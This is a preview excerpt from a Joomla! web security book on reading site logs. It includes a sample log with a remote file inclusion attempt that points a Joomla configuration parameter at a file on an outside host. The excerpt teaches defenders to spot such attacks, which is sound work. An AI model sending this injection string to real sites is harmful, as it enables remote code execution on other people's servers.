O'Reilly logo

Joomla! Web Security: Secure your Joomla! Website from Common Security Threats with this easy-to-use Guide by Tom Canavan

Stay ahead with the world's most comprehensive technology and business learning platform.

With Safari, you learn the way you learn best. Get unlimited access to videos, live online training, learning paths, books, tutorials, and more.

Start Free Trial

No credit card required

Learning to Read the Log

The logs should be reviewed daily for issues. These may be system issues, or attacks in progress, or you may see just for knowledge where your users are looking.

Here is an example. Let’s see if you can find the issues:

[xx.xx.xx.52 - Internet Explorer - 4/23 13:06]
/index2.php?option=com_content&do_pdf=1&id=6
[xx.xx.xx.155 - Internet Explorer - 4/23 13:00]
//?mosConfig_absolute_path=http://www.cdpm3.com/test.txt???
 [xx.xx.xx.202 - Firefox - 4/23 12:53]
/favicon.ico
 [xx.xx.xx.82 - Internet Explorer - 4/23 12:45]
/index.php?option=com_docman&task=search_form&Itemid=27

This is not a common log format file from Apache, but a log file from a site. It records a lot of the same information. This particular log is generated ...

With Safari, you learn the way you learn best. Get unlimited access to videos, live online training, learning paths, books, interactive tutorials, and more.

Start Free Trial

No credit card required